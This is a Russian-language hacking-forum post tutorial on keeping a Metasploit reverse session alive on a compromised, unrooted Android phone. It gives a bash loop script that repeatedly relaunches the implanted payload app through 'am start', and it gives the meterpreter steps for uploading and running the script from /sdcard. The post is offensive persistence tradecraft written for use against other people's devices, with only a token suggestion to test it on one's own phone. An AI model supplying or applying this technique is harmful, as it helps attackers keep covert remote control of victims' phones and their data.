Закрепление в системе Андроид

  • Автор темы OneForm
  • Дата начала
  • Просмотров 3865 Просмотров

OneForm

Продавец
93
136
27 Фев 2018
Сегодня покажу как закрепиться в системе андроид. Скрипт будет работать до перезагрузки!. Наверняка у всех такое было, когда умирает сессия при пропадании соединения, и нет возможности запустить её снова, и успеть сделать все дела.
Нам необходимо создать полезную нагрузку, создали. Далее запускаем листенер в метасплоите, получили сессию. Приступим.
Теперь нам необходимо узнать в какой мы директории.


Команда pwd

RQTQ1vFQ6ww.jpg


Сейчас нам нужно найти ту директорию, в которую мы сможем загрузить наш скрипт. Так как у нас нету рута, и мы не можем загрузить его в системную директорию.
Для этого нам нужно перейти во внутреннюю память телефона или же на карту памяти.
В моём случае командой.
cd /sdcard/


E-Mh4RofwzQ.jpg


Сейчас нам требуется отредактировать наш bash скрипт

Код:

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.omnttopjcg.wpzfylbays/.MainActivity
sleep 20
done
Строчку com.omnttopjcg.wpzfylbays вы должны заменить на свою. Получили мы её командой pwd
После того как заменили текст, сохраняем наш скрипт, и загружаем командой upload , и указываем директорию к нашему скрипту или же просто перетащим его с нашёго рабочего стола в консоль. Загрузили.
Заходим в shell. Команда
shell
И запускаем наш скрипт.
sh *название вашего скрипта* *


fKujIfGGFl0.jpg


Для того чтобы скрипт сработал, нам необходимо подождать 1 минуту. "Обязательно!" Тут главно не передержать, а иначе всё испортим..
Прошло 2,5, нам необходимо остановить наш скрипт сочетанием клавиш "Ctrl+c". И подтверждаем закрытие Y
Готово. Сессия будет прилетать даже при плохом соединении. Нам нужно лишь снова написать команду exploit. Для того чтобы понять как это работает, необходимо протестировать на своём устройстве.